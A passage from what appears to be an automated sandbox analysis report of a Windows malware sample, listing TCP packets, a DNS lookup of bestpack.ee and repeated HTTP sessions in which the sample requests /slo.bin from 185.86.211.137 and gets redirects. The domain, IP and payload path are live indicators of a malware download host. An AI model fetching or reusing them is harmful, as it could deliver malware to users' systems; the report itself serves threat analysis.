                                                                                                                      Sep 27, 2024 19:06:11.788096905 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.788405895 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.788729906 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.788744926 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:11.788948059 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:11.788963079 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:12.229798079 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:12.229994059 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:12.230056047 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:12.230108976 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:12.230204105 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:12.230205059 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:12.230412006 CEST49839443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:12.230465889 CEST44349839185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:21.344482899 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:21.344788074 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.242136002 CEST4983880192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.242371082 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.458448887 CEST8049838185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.460381985 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.460609913 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.460724115 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.678495884 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.679668903 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.679871082 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.680181026 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.680294037 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:22.680461884 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.680629969 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:22.680675030 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.128465891 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.128801107 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.130997896 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.131052017 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.131331921 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.131373882 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564488888 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564639091 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.564699888 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564826965 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564867020 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.564910889 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:23.564934015 CEST44349841185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:23.564960957 CEST49841443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:32.689629078 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:32.690001965 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:33.567750931 CEST4984080192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:33.567842007 CEST4984280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:33.785505056 CEST8049840185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:33.787761927 CEST8049842185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:33.787993908 CEST4984280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:33.788108110 CEST4984280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.007947922 CEST8049842185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.009402990 CEST8049842185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.009848118 CEST4984280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.010171890 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.010294914 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.010550022 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.010725021 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.010771990 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.455806971 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.456001043 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.456398010 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.456439972 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.456548929 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.456590891 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.894159079 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.894368887 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.894450903 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.894531012 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:34.894622087 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.894696951 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:34.894696951 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:35.206768990 CEST49843443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 19:06:35.206847906 CEST44349843185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:44.015079975 CEST8049842185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 19:06:44.015326023 CEST4984280192.168.11.20185.86.211.137

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Sep 27, 2024 18:58:46.861701965 CEST6025253192.168.11.201.1.1.1
                                                                                                                      Sep 27, 2024 18:58:47.310432911 CEST53602521.1.1.1192.168.11.20

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Sep 27, 2024 18:58:46.861701965 CEST192.168.11.201.1.1.10xf08fStandard query (0)bestpack.eeA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Sep 27, 2024 18:58:47.310432911 CEST1.1.1.1192.168.11.200xf08fNo error (0)bestpack.ee185.86.211.137A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • bestpack.ee

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.11.2049760185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 18:58:47.534271955 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 18:58:47.751358986 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:58:47 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.11.2049762185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 18:58:58.966526031 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 18:58:59.185018063 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:58:59 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.11.2049764185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 18:59:10.338602066 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 18:59:10.556744099 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:10 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.11.2049766185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 18:59:21.714462996 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 18:59:21.935507059 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:21 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.11.2049768185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 18:59:33.103394032 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 18:59:33.325213909 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:33 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.11.2049770185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 18:59:44.487292051 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 18:59:44.705246925 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:44 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.11.2049772185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 18:59:55.875292063 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 18:59:56.094286919 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 16:59:55 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.11.2049774185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:00:07.278505087 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:00:07.496660948 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:07 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.11.2049776185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Sep 27, 2024 19:00:18.698251963 CEST163OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Host: bestpack.ee
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Sep 27, 2024 19:00:18.915961981 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:18 GMT
                                                                                                                      Server: Apache
                                                                                                                      Location: https://bestpack.ee/slo.bin
                                                                                                                      Content-Length: 235
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 73 6c 6f 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/slo.bin">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.11.2049778185.86.211.137806976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
